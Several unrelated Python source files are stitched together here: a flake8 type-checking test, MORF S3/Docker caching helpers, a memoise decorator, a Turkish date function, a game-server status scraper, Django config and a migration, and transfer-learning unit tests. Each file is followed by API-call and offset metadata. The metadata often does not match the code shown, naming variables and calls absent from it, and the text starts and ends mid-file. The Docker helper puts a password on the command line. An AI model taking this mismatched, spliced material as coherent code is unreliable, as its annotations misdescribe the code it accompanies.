One thing to note: futures imports should always be at the top of a file, so we only need to check one line.
"""
import pytest
from flake8_type_checking.codes import TC100
from tests import _get_error, mod
# (python source snippet, expected flake8 error set) pairs consumed by the
# parametrized test below. TC100 fires when a TYPE_CHECKING block contains
# imports but 'from __future__ import annotations' is missing.
examples = [
    # No errors
    ('', set()),
    ('if TYPE_CHECKING:\n\tx = 2', set()),
    # Unused import
    ('if TYPE_CHECKING:\n\tfrom typing import Dict', {'1:0 ' + TC100}),
    ('if TYPE_CHECKING:\n\tfrom typing import Dict, Any', {'1:0 ' + TC100}),
    (f'if TYPE_CHECKING:\n\timport {mod}', {'1:0 ' + TC100}),
    (f'if TYPE_CHECKING:\n\tfrom {mod} import constants', {'1:0 ' + TC100}),
    # Used imports
    ('if TYPE_CHECKING:\n\tfrom typing import Dict\nx = Dict', set()),
    ('if TYPE_CHECKING:\n\tfrom typing import Dict, Any\nx, y = Dict, Any', set()),
    (f'if TYPE_CHECKING:\n\timport {mod}\nx = {mod}.constants.TC001', set()),
    (f'if TYPE_CHECKING:\n\tfrom {mod} import constants\nprint(constants)', set()),
    # Import used for AnnAssign
    ('if TYPE_CHECKING:\n\tfrom typing import Dict\nx: Dict[str, int]', {'1:0 ' + TC100}),
    ('if TYPE_CHECKING:\n\tfrom typing import Dict\nx: Dict[str, int] = {}', {'1:0 ' + TC100}),
    # Import used for arg
    ('if TYPE_CHECKING:\n\tfrom typing import Dict\ndef example(x: Dict[str, int]):\n\tpass', {'1:0 ' + TC100}),
    ('if TYPE_CHECKING:\n\tfrom typing import Dict\ndef example(x: Dict[str, int] = {}):\n\tpass', {'1:0 ' + TC100}),
    # Import used for returns
    ('if TYPE_CHECKING:\n\tfrom typing import Dict\ndef example() -> Dict[str, int]:\n\tpass', {'1:0 ' + TC100}),
    # Probably not much point in adding many more test cases, as the logic for TC100
    # is not dependent on the type of annotation assignments; it's purely concerned with
    # whether an ast.Import or ast.ImportFrom exists within a type checking block
]
@pytest.mark.parametrize('example, expected', examples)
def test_TC100_errors(example, expected):
    """Each snippet must yield exactly the expected set of TC100 errors."""
    actual = _get_error(example, error_code_filter='TC100')
    assert actual == expected
| [
"pytest.mark.parametrize",
"tests._get_error"
] | [((2040, 2094), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""example, expected"""', 'examples'], {}), "('example, expected', examples)\n", (2063, 2094), False, 'import pytest\n'), ((2148, 2194), 'tests._get_error', '_get_error', (['example'], {'error_code_filter': '"""TC100"""'}), "(example, error_code_filter='TC100')\n", (2158, 2194), False, 'from tests import _get_error, mod\n')] |
# Copyright (c) 2018 The Regents of the University of Michigan
# and the University of Pennsylvania
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Functions for caching data for MORF jobs.
"""
import os
import subprocess
import shutil
from urllib.parse import urlparse
import logging
from morf.utils.docker import load_docker_image
from morf.utils.log import set_logger_handlers, execute_and_log_output
from morf.utils.s3interface import sync_s3_bucket_cache
# Module-level logger; per-job handlers are attached via set_logger_handlers.
module_logger = logging.getLogger(__name__)
def make_course_session_cache_dir_fp(job_config, bucket, data_dir, course, session):
    """Return the local cache directory path for a course session within a bucket."""
    return os.path.join(job_config.cache_dir, bucket, data_dir, course, session)
def update_raw_data_cache(job_config):
    """
    Refresh the local raw-data cache; every raw data bucket in job_config is synced
    into its own named directory within the job cache directory.
    :param job_config: MorfJobConfig object.
    :return: None
    """
    for bucket_name in job_config.raw_data_buckets:
        sync_s3_bucket_cache(job_config, bucket_name)
def update_proc_data_cache(job_config):
    """
    Refresh the local cache of the processed-data bucket. Assumes job_config
    contains at most one proc_data_bucket.
    :param job_config: MorfJobConfig object.
    :return: None
    """
    bucket_name = getattr(job_config, "proc_data_bucket", None)
    sync_s3_bucket_cache(job_config, bucket_name)
def fetch_from_cache(job_config, cache_file_path, dest_dir):
    """
    Fetch a file from the local cache for job_config into dest_dir, if it exists.
    :param job_config: MorfJobConfig object; its cache_dir attribute (if any) roots the cache.
    :param cache_file_path: string, relative path to file in cache (this is identical to the directory path in s3; e.g. "/bucket/path/to/somefile.csv")
    :param dest_dir: absolute path of directory to fetch file into (will be created if not exists)
    :return: path to fetched file (string); None if the cache is unused or the file is absent.
    """
    logger = set_logger_handlers(module_logger, job_config)
    logger.info("fetching file {} from cache".format(cache_file_path))
    # Guard BEFORE building the path: the original computed
    # os.path.join(getattr(job_config, "cache_dir", None), ...) first, which
    # raises TypeError when job_config has no cache_dir attribute.
    if not hasattr(job_config, "cache_dir"):
        logger.warning("no cache_dir configured; skipping cache fetch for {}".format(cache_file_path))
        return None
    abs_cache_file_path = os.path.join(job_config.cache_dir, cache_file_path)
    if not os.path.exists(abs_cache_file_path):
        logger.warning("file {} does not exist in cache".format(abs_cache_file_path))
        return None
    # exist_ok avoids the check-then-create race of the original exists()+makedirs()
    os.makedirs(dest_dir, exist_ok=True)
    return shutil.copy(abs_cache_file_path, dest_dir)
def docker_cloud_login(job_config):
    """
    Log into Docker Cloud using the credentials held in job_config.
    :param job_config: MorfJobConfig object.
    :return: None
    """
    logger = set_logger_handlers(module_logger, job_config)
    login_cmd = "docker login --username={} --password={}".format(
        job_config.docker_cloud_username, job_config.docker_cloud_password
    )
    execute_and_log_output(login_cmd, logger)
def docker_cloud_push(job_config, image_uuid):
    """
    Tag image_uuid with this job's morf_id and push it to the Docker Cloud repo in job_config.
    :param job_config: MorfJobConfig object
    :param image_uuid: Docker image uuid
    :return: "<repo>:<tag>" path the image was pushed to
    """
    logger = set_logger_handlers(module_logger, job_config)
    # tag the docker image using the morf_id, then push that tag
    repo_and_tag = "{}:{}".format(job_config.docker_cloud_repo, job_config.morf_id)
    execute_and_log_output("docker tag {} {}".format(image_uuid, repo_and_tag), logger)
    execute_and_log_output("docker push {}".format(repo_and_tag), logger)
    return repo_and_tag
def cache_to_docker_hub(job_config, dir, image_name):
    """
    Load a Docker image from dir and push it to the MORF repo in Docker Hub.
    :param job_config: MorfJobConfig object.
    :param dir: directory containing the Docker image to load.
    :param image_name: name of the Docker image to load.
    :return: "<repo>:<tag>" path the image was pushed to.
    """
    logger = set_logger_handlers(module_logger, job_config)
    loaded_image_uuid = load_docker_image(dir, job_config, logger, image_name)
    docker_cloud_login(job_config)
    return docker_cloud_push(job_config, loaded_image_uuid)
| [
"logging.getLogger",
"os.path.exists",
"os.makedirs",
"morf.utils.log.set_logger_handlers",
"os.path.join",
"morf.utils.s3interface.sync_s3_bucket_cache",
"morf.utils.docker.load_docker_image",
"shutil.copy",
"morf.utils.log.execute_and_log_output"
] | [((1492, 1519), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1509, 1519), False, 'import logging\n'), ((1616, 1685), 'os.path.join', 'os.path.join', (['job_config.cache_dir', 'bucket', 'data_dir', 'course', 'session'], {}), '(job_config.cache_dir, bucket, data_dir, course, session)\n', (1628, 1685), False, 'import os\n'), ((2462, 2512), 'morf.utils.s3interface.sync_s3_bucket_cache', 'sync_s3_bucket_cache', (['job_config', 'proc_data_bucket'], {}), '(job_config, proc_data_bucket)\n', (2482, 2512), False, 'from morf.utils.s3interface import sync_s3_bucket_cache\n'), ((3043, 3089), 'morf.utils.log.set_logger_handlers', 'set_logger_handlers', (['module_logger', 'job_config'], {}), '(module_logger, job_config)\n', (3062, 3089), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((3923, 3969), 'morf.utils.log.set_logger_handlers', 'set_logger_handlers', (['module_logger', 'job_config'], {}), '(module_logger, job_config)\n', (3942, 3969), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((3974, 4009), 'morf.utils.log.execute_and_log_output', 'execute_and_log_output', (['cmd', 'logger'], {}), '(cmd, logger)\n', (3996, 4009), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((4289, 4335), 'morf.utils.log.set_logger_handlers', 'set_logger_handlers', (['module_logger', 'job_config'], {}), '(module_logger, job_config)\n', (4308, 4335), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((4571, 4610), 'morf.utils.log.execute_and_log_output', 'execute_and_log_output', (['tag_cmd', 'logger'], {}), '(tag_cmd, logger)\n', (4593, 4610), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((4723, 4763), 'morf.utils.log.execute_and_log_output', 'execute_and_log_output', (['push_cmd', 'logger'], {}), '(push_cmd, logger)\n', (4745, 4763), False, 'from morf.utils.log import 
set_logger_handlers, execute_and_log_output\n'), ((4997, 5043), 'morf.utils.log.set_logger_handlers', 'set_logger_handlers', (['module_logger', 'job_config'], {}), '(module_logger, job_config)\n', (5016, 5043), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((5061, 5115), 'morf.utils.docker.load_docker_image', 'load_docker_image', (['dir', 'job_config', 'logger', 'image_name'], {}), '(dir, job_config, logger, image_name)\n', (5078, 5115), False, 'from morf.utils.docker import load_docker_image\n'), ((2080, 2129), 'morf.utils.s3interface.sync_s3_bucket_cache', 'sync_s3_bucket_cache', (['job_config', 'raw_data_bucket'], {}), '(job_config, raw_data_bucket)\n', (2100, 2129), False, 'from morf.utils.s3interface import sync_s3_bucket_cache\n'), ((3301, 3336), 'os.path.exists', 'os.path.exists', (['abs_cache_file_path'], {}), '(abs_cache_file_path)\n', (3315, 3336), False, 'import os\n'), ((3431, 3473), 'shutil.copy', 'shutil.copy', (['abs_cache_file_path', 'dest_dir'], {}), '(abs_cache_file_path, dest_dir)\n', (3442, 3473), False, 'import shutil\n'), ((3353, 3377), 'os.path.exists', 'os.path.exists', (['dest_dir'], {}), '(dest_dir)\n', (3367, 3377), False, 'import os\n'), ((3391, 3412), 'os.makedirs', 'os.makedirs', (['dest_dir'], {}), '(dest_dir)\n', (3402, 3412), False, 'import os\n')] |
import functools
def memoise(func):
    """Run func at most once; every later call returns the first result.

    NOTE: the cache is keyed on nothing — arguments of subsequent calls are
    ignored and only the first call's result is ever produced.
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        if wrapper.hasResult:
            return wrapper.result
        wrapper.result = func(*args, **kwargs)
        wrapper.hasResult = True
        return wrapper.result
    wrapper.hasResult = False
    wrapper.result = None
    return wrapper
| [
"functools.wraps"
] | [((42, 63), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (57, 63), False, 'import functools\n')] |
import datetime as suan
def al(text):
    """Return the current time/date component named by *text*, in Turkish.

    Recognized prefixes: "saat"/"dakika"/"saniye" -> "HH:MM:SS",
    "tarih" -> "<weekday>/<month>/<year> HH:MM:SS", "gün"/"gun" -> weekday,
    "ay" -> month, "yıl"/"yil" -> year. Any other prefix returns None.
    On a clock/formatting error a Turkish error message is returned.
    """
    # English -> Turkish lookup tables replace the original 19-branch if/elif chains.
    gunler = {
        "Monday": "Pazartesi", "Tuesday": "Salı", "Wednesday": "Çarşamba",
        "Thursday": "Perşembe", "Friday": "Cuma", "Saturday": "Cumartesi",
        "Sunday": "Pazar",
    }
    aylar = {
        "January": "Ocak", "February": "Şubat", "March": "Mart",
        "April": "Nisan", "May": "Mayıs", "June": "Haziran",
        "July": "Temmuz", "August": "Ağustos", "September": "Eylül",
        "October": "Ekim", "November": "Kasım", "December": "Aralık",
    }
    try:
        zaman = suan.datetime.now()
        saat = zaman.strftime("%H")
        dakika = zaman.strftime("%M")
        saniye = zaman.strftime("%S")
        # .get(k, k) keeps the locale's own name when it is not an English one,
        # matching the original behaviour of leaving unknown names untouched.
        gun = gunler.get(zaman.strftime("%A"), zaman.strftime("%A"))
        ay = aylar.get(zaman.strftime("%B"), zaman.strftime("%B"))
        yil = zaman.strftime("%Y")
    except Exception:  # narrowed from a bare except:; message preserved verbatim
        return "Tarih, saati alırken hata ile karşılaştım."
    if text.startswith(("saat", "dakika", "saniye")):
        return saat + ":" + dakika + ":" + saniye
    if text.startswith("tarih"):
        return gun + "/" + ay + "/" + yil + " " + saat + ":" + dakika + ":" + saniye
    if text.startswith(("gün", "gun")):
        return gun
    if text.startswith("ay"):
        return ay
    if text.startswith(("yıl", "yil")):
        return yil
    return None
"datetime.datetime.now"
] | [((66, 85), 'datetime.datetime.now', 'suan.datetime.now', ([], {}), '()\n', (83, 85), True, 'import datetime as suan\n')] |
import requests
import atexit
from apscheduler.schedulers.background import BackgroundScheduler
from bs4 import BeautifulSoup
class lodeStoneScraper:
    """Scrapes the FFXIV Lodestone world-status page and caches per-world
    status, refreshed by a background job every 15 seconds.

    Each cached entry maps a world name to
    ``[category, character_creation_available, online]``.
    """

    def __init__(self):
        self.__URL = 'https://na.finalfantasyxiv.com/lodestone/worldstatus/'
        self.__statistics = {}
        self.update_page()
        # Refresh the cached data on a 15-second interval in the background.
        self.__scheduler = BackgroundScheduler()
        self.__scheduler.add_job(func=self.update_page, trigger='interval', seconds=15)
        self.__scheduler.start()
        # Ensure the background scheduler is shut down on interpreter exit.
        atexit.register(lambda: self.__scheduler.shutdown())

    def update_page(self):
        """Fetch the world-status page and refresh the cached statistics.

        On any failure the previous snapshot is restored and the error is
        logged, so callers always see a consistent dictionary.
        """
        # Copy (not alias) the current data so a failure mid-update can be
        # rolled back. The original code saved only a reference
        # (temp = self.__statistics), which made the rollback a no-op and
        # could leave a partially-updated dictionary behind.
        snapshot = dict(self.__statistics)
        try:
            # Fetch and parse the page.
            page = requests.get(self.__URL)
            soup = BeautifulSoup(page.content, 'html.parser')
            # Extract the relevant divs and convert them to plain values.
            names = self.__parse_name(soup.find_all('div', class_='world-list__world_name'))
            types = self.__parse_type(soup.find_all('div', class_='world-list__world_category'))
            char_flags = self.__parse_char_status(soup.find_all('div', class_='world-list__create_character'))
            online_flags = self.__parse_server_online_status(soup.find_all('div', class_='world-list__status_icon'))
            # Collate the data (index-based so a malformed page with
            # mismatched list lengths raises and triggers the rollback).
            for x in range(len(names)):
                self.__statistics[names[x]] = [types[x], char_flags[x], online_flags[x]]
        except Exception as e:
            # Roll back to the last known-good data and log the failure.
            self.__statistics = snapshot
            print(f'An exception occurred while trying to update data: {e}')

    def get_data(self):
        """Return the currently cached {world_name: [type, cc, online]} dict."""
        return self.__statistics

    def __parse_name(self, server_names):
        """Extract world names from the scraped name divs."""
        return [server.find('p').getText() for server in server_names]

    def __parse_type(self, server_types):
        """Extract world categories; offline worlds show '--', which is
        normalised to an empty string."""
        types = []
        for item in server_types:
            label = item.find('p').getText()
            types.append('' if label == '--' else label)
        return types

    def __parse_char_status(self, server_char_status):
        """Return True per world where character creation is available.

        Offline worlds have no tooltip icon, so the subscript raises; that
        is treated as "creation unavailable".
        """
        char_states = []
        for item in server_char_status:
            try:
                char_states.append('Available' in item.i['data-tooltip'])
            except Exception:
                char_states.append(False)
        return char_states

    def __parse_server_online_status(self, server_online_status):
        """Return True per world whose status tooltip contains 'Online'."""
        return ['Online' in item.i['data-tooltip'] for item in server_online_status]
"bs4.BeautifulSoup",
"requests.get",
"apscheduler.schedulers.background.BackgroundScheduler"
] | [((365, 386), 'apscheduler.schedulers.background.BackgroundScheduler', 'BackgroundScheduler', ([], {}), '()\n', (384, 386), False, 'from apscheduler.schedulers.background import BackgroundScheduler\n'), ((820, 844), 'requests.get', 'requests.get', (['self.__URL'], {}), '(self.__URL)\n', (832, 844), False, 'import requests\n'), ((864, 906), 'bs4.BeautifulSoup', 'BeautifulSoup', (['page.content', '"""html.parser"""'], {}), "(page.content, 'html.parser')\n", (877, 906), False, 'from bs4 import BeautifulSoup\n')] |
"""
WSGI config for test_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# test_project directory.
app_path = os.path.dirname(os.path.abspath(__file__)).replace('/config', '')
sys.path.append(os.path.join(app_path, 'test_project'))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.base")
application = get_wsgi_application()
| [
"os.environ.setdefault",
"django.core.wsgi.get_wsgi_application",
"os.path.join",
"os.path.abspath"
] | [((519, 590), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""config.settings.base"""'], {}), "('DJANGO_SETTINGS_MODULE', 'config.settings.base')\n", (540, 590), False, 'import os\n'), ((606, 628), 'django.core.wsgi.get_wsgi_application', 'get_wsgi_application', ([], {}), '()\n', (626, 628), False, 'from django.core.wsgi import get_wsgi_application\n'), ((478, 516), 'os.path.join', 'os.path.join', (['app_path', '"""test_project"""'], {}), "(app_path, 'test_project')\n", (490, 516), False, 'import os\n'), ((412, 437), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (427, 437), False, 'import os\n')] |
# Generated by Django 2.1.1 on 2020-04-05 06:12
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the ``Response`` model.

    Field names suggest a survey submission with an uploaded audio file
    (``cough``) — do not hand-edit this file; schema changes belong in a
    new migration.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Response',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('location', models.CharField(max_length=200)),
                ('email', models.EmailField(max_length=200)),
                # Empty upload_to means files land directly under MEDIA_ROOT.
                ('cough', models.FileField(upload_to='')),
                # Timestamp is set automatically on insert.
                ('uploaded_at', models.DateTimeField(auto_now_add=True)),
            ],
        ),
    ]
| [
"django.db.models.EmailField",
"django.db.models.FileField",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.models.CharField"
] | [((304, 397), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (320, 397), False, 'from django.db import migrations, models\n'), ((421, 453), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (437, 453), False, 'from django.db import migrations, models\n'), ((485, 517), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (501, 517), False, 'from django.db import migrations, models\n'), ((546, 579), 'django.db.models.EmailField', 'models.EmailField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (563, 579), False, 'from django.db import migrations, models\n'), ((608, 638), 'django.db.models.FileField', 'models.FileField', ([], {'upload_to': '""""""'}), "(upload_to='')\n", (624, 638), False, 'from django.db import migrations, models\n'), ((673, 712), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (693, 712), False, 'from django.db import migrations, models\n')] |
from ctypes.util import find_library as _find_library

# Report where (or whether) the shared libsndfile library can be located.
print(_find_library('sndfile'))
print('test fine')
| [
"ctypes.util.find_library"
] | [((61, 85), 'ctypes.util.find_library', '_find_library', (['"""sndfile"""'], {}), "('sndfile')\n", (74, 85), True, 'from ctypes.util import find_library as _find_library\n')] |
"""
Test functions for regular module.
"""
import pytest
import numpy as np
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.base import clone
import tensorflow as tf
from tensorflow.keras import Sequential, Model
from tensorflow.keras.layers import Dense
from tensorflow.keras.optimizers import Adam
from adapt.parameter_based import (RegularTransferLR,
RegularTransferLC,
RegularTransferNN)
np.random.seed(0)
# Synthetic 1-D data: source Xs mixes two clusters (around 0 and 1); the
# target Xt is a single cluster around 0.
Xs = np.concatenate((
    np.random.randn(50)*0.1,
    np.random.randn(50)*0.1 + 1.,
)).reshape(-1, 1)
Xt = (np.random.randn(100) * 0.1).reshape(-1, 1)
# Piecewise regression targets: 0.2*x below 0.5, the constant 10 otherwise.
ys_reg = np.array([0.2 * x if x<0.5 else
                  10 for x in Xs.ravel()]).reshape(-1, 1)
yt_reg = np.array([0.2 * x if x<0.5 else
                  10 for x in Xt.ravel()]).reshape(-1, 1)
# Binary labels in {-1., +1.} derived from the same threshold rule.
ys_classif = np.sign(np.array(
    [x<0 if x<0.5 else x<1 for x in Xs.ravel()]
).astype(float) - 0.5).reshape(-1, 1)
yt_classif = np.sign(np.array(
    [x<0 if x<0.5 else x<1 for x in Xt.ravel()]
).astype(float) - 0.5).reshape(-1, 1)
def _get_network(input_shape=(1,), output_shape=(1,)):
    """Build and compile a minimal bias-free single-layer Keras model."""
    net = Sequential()
    units = np.prod(output_shape)
    net.add(Dense(units,
                  input_shape=input_shape,
                  use_bias=False))
    net.compile(loss="mse", optimizer=Adam(0.1))
    return net
def test_setup():
    """Sanity-check the synthetic data: a source-only linear fit recovers a
    large slope, and a source-only classifier transfers poorly to Xt."""
    reg = LinearRegression(fit_intercept=False)
    reg.fit(Xs, ys_reg)
    assert np.abs(reg.coef_[0][0] - 10) < 1
    clf = LogisticRegression(penalty='none', solver='lbfgs')
    clf.fit(Xs, ys_classif)
    assert (clf.predict(Xt) == yt_classif.ravel()).sum() < 70
def test_regularlr_fit():
    """RegularTransferLR: lambda_=0 follows the target data, a huge lambda_
    pins coefficients to the source model, lambda_=1 lands in between."""
    np.random.seed(0)
    source = LinearRegression(fit_intercept=False)
    source.fit(Xs, ys_reg)
    # No regularization: the transferred model fits the target freely.
    transferred = RegularTransferLR(source, lambda_=0.)
    transferred.fit(Xt, yt_reg)
    assert np.abs(transferred.estimator_.coef_[0] - 0.2) < 1
    assert np.abs(transferred.predict(Xt) - yt_reg).sum() < 2
    # Very strong regularization: coefficients stay at the source values.
    transferred = RegularTransferLR(source, lambda_=1000000)
    transferred.fit(Xt, yt_reg)
    assert np.abs(transferred.estimator_.coef_[0] - 10) < 1
    assert np.abs(transferred.estimator_.coef_[0] - source.coef_[0]) < 0.001
    # Moderate regularization: a compromise between source and target.
    transferred = RegularTransferLR(source, lambda_=1.)
    transferred.fit(Xt, yt_reg)
    assert np.abs(transferred.estimator_.coef_[0] - 4) < 1
def test_regularlr_multioutput():
    """RegularTransferLR supports multi-output targets and preserves the
    sklearn (n_outputs, n_features) coefficient layout."""
    np.random.seed(0)
    features = np.random.randn(100, 5)+2.
    targets = features[:, :2]
    source = LinearRegression()
    source.fit(features, targets)
    transferred = RegularTransferLR(source, lambda_=1.)
    transferred.fit(features, targets)
    assert np.abs(transferred.predict(features) - targets).sum() < 2
    assert np.all(transferred.coef_.shape == (2, 5))
    assert np.all(transferred.intercept_.shape == (2,))
    assert transferred.score(features, targets) > 0.9
def test_regularlr_error():
    """Fitting with a feature/output count that differs from the source
    model's must raise an informative ValueError."""
    np.random.seed(0)
    Xs = np.random.randn(100, 5)
    Xt = np.random.randn(100, 5)
    ys = np.random.randn(100)
    yt = np.random.randn(100)
    lr = LinearRegression()
    lr.fit(Xs, ys)
    model = RegularTransferLR(lr, lambda_=1.)
    model.fit(Xt, yt)
    # Wrong number of input features (4 instead of 5).
    with pytest.raises(ValueError) as excinfo:
        model.fit(np.random.randn(100, 4), yt)
    assert "expected 5, got 4" in str(excinfo.value)
    # Wrong number of outputs (2 instead of 1).
    with pytest.raises(ValueError) as excinfo:
        model.fit(Xt, np.random.randn(100, 2))
    assert "expected 1, got 2" in str(excinfo.value)
def test_regularlc_fit():
    """RegularTransferLC: no penalty adapts fully to the target, a huge
    penalty freezes the source classifier, a moderate one still adapts."""
    np.random.seed(0)
    source = LogisticRegression(penalty='none', solver='lbfgs')
    source.fit(Xs, ys_classif)
    # lambda_=0: free adaptation to the target labels.
    transferred = RegularTransferLC(source, lambda_=0)
    transferred.fit(Xt, yt_classif)
    assert (transferred.predict(Xt) == yt_classif.ravel()).sum() > 90
    # Huge lambda_: parameters stay at the source classifier's values.
    transferred = RegularTransferLC(source, lambda_=100000000)
    transferred.fit(Xt, yt_classif)
    assert (transferred.predict(Xt) == yt_classif.ravel()).sum() < 70
    assert np.abs(transferred.estimator_.coef_[0][0] - source.coef_[0][0]) < 0.001
    assert np.abs(transferred.estimator_.intercept_ - source.intercept_[0]) < 0.001
    # Moderate lambda_: adaptation still succeeds.
    transferred = RegularTransferLC(source, lambda_=1.2)
    transferred.fit(Xt, yt_classif)
    assert (transferred.predict(Xt) == yt_classif.ravel()).sum() > 95
def test_regularlc_multiclass():
    """RegularTransferLC supports a three-class problem and preserves the
    sklearn (n_classes, n_features) coefficient layout."""
    np.random.seed(0)
    X = np.random.randn(100, 5)
    # Three classes derived from sums of feature subsets.
    y = np.zeros(len(X))
    y[X[:, :2].sum(1)<0] = 1
    y[X[:, 3:].sum(1)>0] = 2
    lr = LogisticRegression(penalty='none', solver='lbfgs')
    lr.fit(X, y)
    model = RegularTransferLC(lr, lambda_=1.)
    model.fit(X, y)
    assert (model.predict(X) == y).sum() > 90
    assert np.all(model.coef_.shape == (3, 5))
    assert np.all(model.intercept_.shape == (3,))
    assert model.score(X, y) > 0.9
def test_regularnn_fit():
    """RegularTransferNN: lambdas=0. lets the network move toward the
    target data, while a huge lambdas keeps the weights at the source
    network's values (and the target fit stays poor)."""
    tf.random.set_seed(0)
    np.random.seed(0)
    network = _get_network()
    network.fit(Xs, ys_reg, epochs=100, batch_size=100, verbose=0)
    # No regularization: weights may move freely toward the target.
    model = RegularTransferNN(network, lambdas=0., optimizer=Adam(0.1))
    model.fit(Xt, yt_reg, epochs=100, batch_size=100, verbose=0)
    # assert np.abs(network.predict(Xs) - ys_reg).sum() < 1
    assert np.sum(np.abs(network.get_weights()[0] - model.get_weights()[0])) > 4.
    assert np.abs(model.predict(Xt) - yt_reg).sum() < 10
    # Huge regularization: weights barely move from the source network.
    model = RegularTransferNN(network, lambdas=10000000., optimizer=Adam(0.1))
    model.fit(Xt, yt_reg, epochs=100, batch_size=100, verbose=0)
    assert np.sum(np.abs(network.get_weights()[0] - model.get_weights()[0])) < 0.001
    assert np.abs(model.predict(Xt) - yt_reg).sum() > 10
def test_regularnn_reg():
    """Only 'l1' and 'l2' are accepted for the ``regularizer`` argument;
    anything else raises ValueError."""
    tf.random.set_seed(0)
    np.random.seed(0)
    source_net = _get_network()
    source_net.fit(Xs, ys_reg, epochs=100, batch_size=100, verbose=0)
    model = RegularTransferNN(source_net, regularizer="l1")
    model.fit(Xt, yt_reg, epochs=100, batch_size=100, verbose=0)
    with pytest.raises(ValueError) as excinfo:
        model = RegularTransferNN(source_net, regularizer="l3")
    assert "l1' or 'l2', got, l3" in str(excinfo.value)
def test_clone():
    """sklearn.base.clone must yield independent, usable copies of both
    RegularTransferLR and RegularTransferLC instances."""
    Xs = np.random.randn(100, 5)
    ys = np.random.choice(2, 100)
    regressor = LinearRegression()
    regressor.fit(Xs, ys)
    model = RegularTransferLR(regressor, lambda_=1.)
    model.fit(Xs, ys)
    cloned = clone(model)
    cloned.fit(Xs, ys)
    cloned.predict(Xs)
    assert model is not cloned
    classifier = LogisticRegression(penalty='none', solver='lbfgs')
    classifier.fit(Xs, ys)
    model = RegularTransferLC(classifier, lambda_=1.)
    model.fit(Xs, ys)
    cloned = clone(model)
    cloned.fit(Xs, ys)
    cloned.predict(Xs)
    assert model is not cloned
"numpy.abs",
"numpy.prod",
"adapt.parameter_based.RegularTransferLR",
"tensorflow.random.set_seed",
"tensorflow.keras.Sequential",
"adapt.parameter_based.RegularTransferNN",
"numpy.random.choice",
"sklearn.base.clone",
"sklearn.linear_model.LogisticRegression",
"tensorflow.keras.optimizers.Adam",
... | [((500, 517), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (514, 517), True, 'import numpy as np\n'), ((1173, 1185), 'tensorflow.keras.Sequential', 'Sequential', ([], {}), '()\n', (1183, 1185), False, 'from tensorflow.keras import Sequential, Model\n'), ((1408, 1445), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {'fit_intercept': '(False)'}), '(fit_intercept=False)\n', (1424, 1445), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((1526, 1576), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""none"""', 'solver': '"""lbfgs"""'}), "(penalty='none', solver='lbfgs')\n", (1544, 1576), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((1697, 1714), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (1711, 1714), True, 'import numpy as np\n'), ((1724, 1761), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {'fit_intercept': '(False)'}), '(fit_intercept=False)\n', (1740, 1761), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((1797, 1831), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(0.0)'}), '(lr, lambda_=0.0)\n', (1814, 1831), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((1985, 2023), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', 